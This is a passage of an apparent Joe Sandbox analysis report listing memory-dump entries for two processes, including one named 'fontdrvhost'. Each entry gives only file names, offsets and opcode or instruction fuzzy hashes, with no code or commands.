                                                                                            • Source File: 00000036.00000002.2169959698.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_54_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6d9e62e8ba1dd924d3387b425855393b0ec87dede90a838616f05235fee6e0d5
                                                                                            • Instruction ID: fcf22d4535d609c776fa7bf893c4a2e158464c94c8d157c1c8f728ad05514b58
                                                                                            • Opcode Fuzzy Hash: 6d9e62e8ba1dd924d3387b425855393b0ec87dede90a838616f05235fee6e0d5
                                                                                            • Instruction Fuzzy Hash: C3419AB1E1CA1D8FDB45EFA8D845AEEBBB1FF58300F10417AE409E7295DA34A9018B51
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000036.00000002.2169959698.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_54_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c597231cca8f1b8b64becb094f899d35c1462097bc4d0178b2a8552134b76c83
                                                                                            • Instruction ID: 91c1a12491ce82ac2aa19dba909b7b45d6a93434cb925849aed75a82b82ffa12
                                                                                            • Opcode Fuzzy Hash: c597231cca8f1b8b64becb094f899d35c1462097bc4d0178b2a8552134b76c83
                                                                                            • Instruction Fuzzy Hash: CB5169B1C0D68A8FDB56AF64C8542FEBFB0FF06300F0545AAD544E6192DA285A48CB51
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000036.00000002.2169959698.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_54_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a6e18650227fe0170340adcfc59849430fb73c8be390f5d7764d8ded745aaa20
                                                                                            • Instruction ID: 0afe4ae81d6b39c32ad8a88677fd37cb427cff6e872cb9c0df9b42977a928828
                                                                                            • Opcode Fuzzy Hash: a6e18650227fe0170340adcfc59849430fb73c8be390f5d7764d8ded745aaa20
                                                                                            • Instruction Fuzzy Hash: D641F6B1C0D61D8FDB56EFB4D4446EEBBB0FF19300F10056AD409E71A2DA78A945CB90
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000036.00000002.2169959698.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_54_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5527c83664f12b72471e1944518c21774fa1e581a6511dbe7a602a8a412e6248
                                                                                            • Instruction ID: 0ab5d227d7f08b1686cf6d54fd7071a403abcdd8ad340626fc7aacc51cdc3172
                                                                                            • Opcode Fuzzy Hash: 5527c83664f12b72471e1944518c21774fa1e581a6511dbe7a602a8a412e6248
                                                                                            • Instruction Fuzzy Hash: 8A41F674A1C91D8FDF98EF68C895BACB7F1FB58305F5480AD904EE3255CE74A8818B40
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000036.00000002.2169959698.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_54_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 11eeaec1591b149b232ac78d780f4c688844d443a9e6d86ebcc85dfab78f4e00
                                                                                            • Instruction ID: e42f2960a28578f8c9ca70d6b6ced9546aee39741f84d0ef7ea462a45a17b964
                                                                                            • Opcode Fuzzy Hash: 11eeaec1591b149b232ac78d780f4c688844d443a9e6d86ebcc85dfab78f4e00
                                                                                            • Instruction Fuzzy Hash: 3431CA7091891D8FDF99EF68C855BEEBBB2FB98305F10412ED509E3295CB349845CB80
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000036.00000002.2169959698.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_54_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9b003d6037fa979cfa303b8f0ac1ba5dd1e8e488470af80d23c3570662bb5652
                                                                                            • Instruction ID: caf2ce3b3e7247a0b007bcbecabb0284920807670cbaf2c367ef19cddc94738d
                                                                                            • Opcode Fuzzy Hash: 9b003d6037fa979cfa303b8f0ac1ba5dd1e8e488470af80d23c3570662bb5652
                                                                                            • Instruction Fuzzy Hash: 17415BB0D0D6598FE755EFB8C8956E9BBB1FF55301F4041BAD049D72A2CA389981CB40
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000036.00000002.2169959698.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_54_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: dc4e68e40b917b638db606f6b1ae002f131ea99f5b2efce4b2913d168edc928f
                                                                                            • Instruction ID: 14877e419ed5daec9989de1cfe694f96f2457e98a6fd0423edc110d2b6dedc7a
                                                                                            • Opcode Fuzzy Hash: dc4e68e40b917b638db606f6b1ae002f131ea99f5b2efce4b2913d168edc928f
                                                                                            • Instruction Fuzzy Hash: C331F5A181DA8A4FE752FF3CC8646E97FA0FF56354F4541BAE988861A3CF245845C381
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000036.00000002.2169959698.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_54_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: fb18ea2b4b3faeaf871713bb95e31a5c5e5a7f0f9a8679695613519f9de55f51
                                                                                            • Instruction ID: a979d542f05a3f3ba63358ae290af9557d85f891f8532dc7eab6012ce3f523b2
                                                                                            • Opcode Fuzzy Hash: fb18ea2b4b3faeaf871713bb95e31a5c5e5a7f0f9a8679695613519f9de55f51
                                                                                            • Instruction Fuzzy Hash: D1217A7191CA5D8FDB81EF68D855AEDBBF1FF59311F04016AE408E32A2CA24A8518B90
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000036.00000002.2169959698.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_54_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b02e942abef0dd3dac6a3baaedfb4afc2528695e05b44f9133028777ccf918ab
                                                                                            • Instruction ID: 85acf573275d38f1fae65c926555df358e7d8d094002cb9c448600fda9c73a55
                                                                                            • Opcode Fuzzy Hash: b02e942abef0dd3dac6a3baaedfb4afc2528695e05b44f9133028777ccf918ab
                                                                                            • Instruction Fuzzy Hash: 38312B70D0D61A8BEBA9EE24C5593B9B6A1EF54300F1045BDD95DD32A2CE38A981CB40
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000036.00000002.2169959698.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_54_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d5fa7b6cef9e535976e6fdfce9775b22612c0c6fda95c9da3c6eaaab1ea05d18
                                                                                            • Instruction ID: ca52b237813064ae153106544972b360c91db2995fdd3e7fdb06b85cb8038686
                                                                                            • Opcode Fuzzy Hash: d5fa7b6cef9e535976e6fdfce9775b22612c0c6fda95c9da3c6eaaab1ea05d18
                                                                                            • Instruction Fuzzy Hash: 0A2160B1D0D60A8AEB68FF74C9556B97BB1EF84310F10447ED61E932E2DE38A941CB40
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000036.00000002.2169959698.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_54_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2884d97d0a76a854476fd92c45c65455bc4594c3069c94687f01e548baed1cc7
                                                                                            • Instruction ID: 721b76014edf632b0d9d9cbd25126fc9bf9f034262fc95b5992aaaa3f43a382e
                                                                                            • Opcode Fuzzy Hash: 2884d97d0a76a854476fd92c45c65455bc4594c3069c94687f01e548baed1cc7
                                                                                            • Instruction Fuzzy Hash: 58219F74A1891DCFDF84EF98D495EEEBBB1FF68301F10416AE50AE3255DA34E8418B90
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000036.00000002.2169959698.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_54_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ace328f5451481c42df0bde4088486bf2fff26352a16b9eaa9973b101ba06b9f
                                                                                            • Instruction ID: 11c22f4d02570dbf242ec174e55a2cacf39006966d2095c81b14c757fd33831d
                                                                                            • Opcode Fuzzy Hash: ace328f5451481c42df0bde4088486bf2fff26352a16b9eaa9973b101ba06b9f
                                                                                            • Instruction Fuzzy Hash: 5D215E7090D7494EEB69AE74C8157B97BB1EF45310F0404BAD509D32D2CE3858458B51
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000036.00000002.2169959698.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_54_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 86bdf8977953bfab2f747c2ae1002e87a96844bc3e892db6643eba56ff223e01
                                                                                            • Instruction ID: 51f8b958882c961d3bb50f4d9fcdea2774e11db0a548e3fe558062c4d3927469
                                                                                            • Opcode Fuzzy Hash: 86bdf8977953bfab2f747c2ae1002e87a96844bc3e892db6643eba56ff223e01
                                                                                            • Instruction Fuzzy Hash: 8A118BB090E78A4EEB6AAF74C8247B97FB1AF86310F0844BAD549D72D3CD289845C751
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000036.00000002.2169959698.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_54_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9702cfb20aff9ad603cca7eb05dfc12709faa99199e85e359dde4db42554a07d
                                                                                            • Instruction ID: d161d0c32e3d0d070fdece93f33831c4ccae110a3ab3afbcbfe7bba227925d2c
                                                                                            • Opcode Fuzzy Hash: 9702cfb20aff9ad603cca7eb05dfc12709faa99199e85e359dde4db42554a07d
                                                                                            • Instruction Fuzzy Hash: 5B1191B0D0DA1A8BEB68BE38C5057BA7AB1EF95310F00457DD61ED32E1CE38A8458A41
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000036.00000002.2169959698.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_54_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 1194fecc25db01f1a61b351338906bf696fac5a4e16f5fecc64ebb5bfc035f3e
                                                                                            • Instruction ID: 418b9aac53f78a95b28981665d4249a13ea2b5bec149a1dd4fa7fc3e3c97e182
                                                                                            • Opcode Fuzzy Hash: 1194fecc25db01f1a61b351338906bf696fac5a4e16f5fecc64ebb5bfc035f3e
                                                                                            • Instruction Fuzzy Hash: F21182B0D0D64A8AE7A9FF38C5453B97AA1EF84300F14847DD61E936E2DE38A841C704
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000036.00000002.2169959698.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_54_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • Instruction Fuzzy Hash: 24519B7180D2898FDB46AF74D8552FE7FB0EF06300F0549BAD408E61A2DA389A48CB52
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000037.00000002.2257436617.00007FFB4B280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B280000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_55_2_7ffb4b280000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b3e7176e47d0a8603f6ed2811cc8679ae0b4f111a998f1189d10a3940135c857
                                                                                            • Instruction ID: 7182ee8ecb039ae30abfb1a9b481999e87b73da5bf520d501a5bed8f7d07f838
                                                                                            • Opcode Fuzzy Hash: b3e7176e47d0a8603f6ed2811cc8679ae0b4f111a998f1189d10a3940135c857
                                                                                            • Instruction Fuzzy Hash: BE412671C0961D8EDB51EFB4D4496EEBBB1FF19300F50067AD409E3192DA78A985CB90
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000037.00000002.2257436617.00007FFB4B280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B280000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_55_2_7ffb4b280000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a4be1818ceca666d54fdec2a3872d00869feacd842fc3e8eb6223d1b531b10d5
                                                                                            • Instruction ID: aac49f2463b9a919cad4a68e746cba3062307849a235c5548d323ed21572c536
                                                                                            • Opcode Fuzzy Hash: a4be1818ceca666d54fdec2a3872d00869feacd842fc3e8eb6223d1b531b10d5
                                                                                            • Instruction Fuzzy Hash: F341E874A1891D8FDF98EF68C895BACB7F1FF58305F5481A9D04EE3291CE74A8818B40
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000037.00000002.2257436617.00007FFB4B280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B280000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_55_2_7ffb4b280000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5ec6c34be66fb8960c3c8fee7e8f479a16c4ff8e5ea828788bfe5f8d0faef91b
                                                                                            • Instruction ID: 6fad060e8873d4bedb7bb319602716f4aecdffa544340601d8d0da2a4b446a9c
                                                                                            • Opcode Fuzzy Hash: 5ec6c34be66fb8960c3c8fee7e8f479a16c4ff8e5ea828788bfe5f8d0faef91b
                                                                                            • Instruction Fuzzy Hash: 6F31ED7091891D8FDF94EF68C855AEEBBB2FF98311F104229D409E32A5CB34A855CB90
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000037.00000002.2257436617.00007FFB4B280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B280000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_55_2_7ffb4b280000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: bf5152d9ccfb065b65e5390152390fc7ddbb997f8cc84f9047349a565678b16c
                                                                                            • Instruction ID: a69d66d006301ba2ad2336d42c926cde11091a57eadb2d13574d7311e894e452
                                                                                            • Opcode Fuzzy Hash: bf5152d9ccfb065b65e5390152390fc7ddbb997f8cc84f9047349a565678b16c
                                                                                            • Instruction Fuzzy Hash: 7F418DB0D096598FEB46EFB4C8496EDBBB2FF55301F4041BAD009D72A2CB389881CB40
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000037.00000002.2257436617.00007FFB4B280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B280000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_55_2_7ffb4b280000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3783cf3d99c449fa4b3a99341bf703f5a7cff2519b8ce548b84837d2ed94aeae
                                                                                            • Instruction ID: ae939119811d0eb5a7be942589050538066e4dd902e682361e4607592010aae2
                                                                                            • Opcode Fuzzy Hash: 3783cf3d99c449fa4b3a99341bf703f5a7cff2519b8ce548b84837d2ed94aeae
                                                                                            • Instruction Fuzzy Hash: 6431D9A181DACA4FD751EF3CC8251E97FA0FF56254F4542B6EC88C6193DB289845C391
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000037.00000002.2257436617.00007FFB4B280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B280000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_55_2_7ffb4b280000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 84e106850460006aa32d2dbc5c10f928a883d0d308d59269548054a9907dbfcf
                                                                                            • Instruction ID: 5e2eef29870364f21ad943440356176bb4fa14e5bf338ffe7816be569d0563de
                                                                                            • Opcode Fuzzy Hash: 84e106850460006aa32d2dbc5c10f928a883d0d308d59269548054a9907dbfcf
                                                                                            • Instruction Fuzzy Hash: 65218B71908A5D8FDF81EF68D845AEDBBF1FF58311F00417AE408E32A2CA34A951CB90
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000037.00000002.2257436617.00007FFB4B280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B280000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_55_2_7ffb4b280000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6224d6fe547f9e6ee1d0a611e5bd07045049fa10629408a94964142f94ffab21
                                                                                            • Instruction ID: 3ee0fe6058a4f7d83d517c74a09c84bb4351fb64634073652bf4e189708dfffd
                                                                                            • Opcode Fuzzy Hash: 6224d6fe547f9e6ee1d0a611e5bd07045049fa10629408a94964142f94ffab21
                                                                                            • Instruction Fuzzy Hash: 08315E70D0960A8BEB69FF34C5593BAB7A1EF54300F1055B9D55DD32E2CE34A981CB40
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000037.00000002.2257436617.00007FFB4B280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B280000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_55_2_7ffb4b280000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 517acce97881f069d1cb4e152de2a99cac4082ea86a2d178fdd2817b98298f69
                                                                                            • Instruction ID: 897ce8d4c8a063b95ddb343e2eb4bd7272bba9fa8ade35108a64aff07251c5b2
                                                                                            • Opcode Fuzzy Hash: 517acce97881f069d1cb4e152de2a99cac4082ea86a2d178fdd2817b98298f69
                                                                                            • Instruction Fuzzy Hash: CC21A1B1D0D60A8BEB68BF74C5456BA7BB1EF94300F105179E61E932E2DE38E941CA40
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000037.00000002.2257436617.00007FFB4B280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B280000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_55_2_7ffb4b280000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0898e84e75e8ad42cc265afa24bc8fe03e6871a79d9db3020a86d83d63d3d85d
                                                                                            • Instruction ID: 953528d8bfc0c751650c31542f1020e651adb7d10d48d8ae66f0ddb8f2810e1d
                                                                                            • Opcode Fuzzy Hash: 0898e84e75e8ad42cc265afa24bc8fe03e6871a79d9db3020a86d83d63d3d85d
                                                                                            • Instruction Fuzzy Hash: 74219274A1891D8FDF84EF98D495EEEBBB1FF6C301F104169E509E3255CA34E8418B90
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000037.00000002.2257436617.00007FFB4B280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B280000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_55_2_7ffb4b280000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 76f52d4e35136a2e70a8913239302bb47856962212608f988809e234f9f6b9eb
                                                                                            • Instruction ID: ebd7c10339103d2af5be6a80951b799cf1062b2d438fcbfb85267fb269746ce6
                                                                                            • Opcode Fuzzy Hash: 76f52d4e35136a2e70a8913239302bb47856962212608f988809e234f9f6b9eb
                                                                                            • Instruction Fuzzy Hash: 8221797090EB498FEB69AF38C8197BA7BB0EF45310F0401BAD409D72A2CE3898458B51
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000037.00000002.2257436617.00007FFB4B280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B280000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_55_2_7ffb4b280000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f84a6405020f046cb537c2c1b41b84530eca86442429a29d2f8949efb65fb62d
                                                                                            • Instruction ID: 3fa3e74c460e0d860d167049a8fa28147ce4cd5e28782b1f8076926748c3a4dd
                                                                                            • Opcode Fuzzy Hash: f84a6405020f046cb537c2c1b41b84530eca86442429a29d2f8949efb65fb62d
                                                                                            • Instruction Fuzzy Hash: F4117CB090E78A4FEB6AAF74C8157BA7FB1AF86310F0840BAD449D72D3CD689845C751
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000037.00000002.2257436617.00007FFB4B280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B280000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_55_2_7ffb4b280000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ac7658f7cf3f340861f10924817d20de5cb095b6c4d5519cf8968b92ee94994e
                                                                                            • Instruction ID: b84d152275ac11be69016132264daeecc6860e2f487d4eab7e3a7f86efed1cc9
                                                                                            • Opcode Fuzzy Hash: ac7658f7cf3f340861f10924817d20de5cb095b6c4d5519cf8968b92ee94994e
                                                                                            • Instruction Fuzzy Hash: EC11A770D0D60E8BEB68FE38C5057BA7AF1EF95310F045679E51ED32E2DE38A8058681
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000037.00000002.2257436617.00007FFB4B280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B280000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_55_2_7ffb4b280000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 16ac39a27c230182b602e2bf224ae4e8d0b5623b04d47383c580120bc13884d2
                                                                                            • Instruction ID: 6e7498da621e3dced8846724fc5e94092027a7dadc310515f2a75c1d8dba9f7f
                                                                                            • Opcode Fuzzy Hash: 16ac39a27c230182b602e2bf224ae4e8d0b5623b04d47383c580120bc13884d2
                                                                                            • Instruction Fuzzy Hash: E01182B0D0D64A8BEBA9FF38C5053BA7AA1EF94300F145579E51D936E2CE39E841C744
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000037.00000002.2257436617.00007FFB4B280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B280000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_55_2_7ffb4b280000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2ab8194b00b3eaed2826a34b7a92a3ec37158d291b764991f0ec89220e321036
                                                                                            • Instruction ID: 1cf8311eb9b734bcaa284d1cb1860ed01accad0e98290cb0ae57ab0f8ed2dee6
                                                                                            • Opcode Fuzzy Hash: 2ab8194b00b3eaed2826a34b7a92a3ec37158d291b764991f0ec89220e321036
                                                                                            • Instruction Fuzzy Hash: 5B1191B0D0EB4A8FEB69AF38C5193B97BB1AF55310F0451B9E519D72E2CE289841C705
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000037.00000002.2257436617.00007FFB4B280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B280000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_55_2_7ffb4b280000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 49009ce7183e4726b4c8e8162492e217f59b491a6649639f7b473c1b3a30864d
                                                                                            • Instruction ID: 23eac858ae830b52ce9ba046167a1dbd1bb0072d217af2f9f0e8b57ffc370d29
                                                                                            • Opcode Fuzzy Hash: 49009ce7183e4726b4c8e8162492e217f59b491a6649639f7b473c1b3a30864d
                                                                                            • Instruction Fuzzy Hash: 2A11A5B0D0DA4A8BEB69BE38C5153BA7AA1EF54310F145539E50ED36D2CE38E8418644
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000037.00000002.2257436617.00007FFB4B280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B280000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_55_2_7ffb4b280000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 1aea373c4281cd1f9722107f80e039fb3740c66833db34ec87ff9452d322c191
                                                                                            • Instruction ID: 1ad3804bda29670a86d60685fcfd53d9754efe1a3639589e5ccead0fba859112
                                                                                            • Opcode Fuzzy Hash: 1aea373c4281cd1f9722107f80e039fb3740c66833db34ec87ff9452d322c191
                                                                                            • Instruction Fuzzy Hash: 1D01ADB090E74A8FEB69EF74C5153BABBA1EF85300F04447AD40AD72D2DE38A841DB45
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000037.00000002.2257436617.00007FFB4B280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B280000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_55_2_7ffb4b280000_fontdrvhost.jbxd
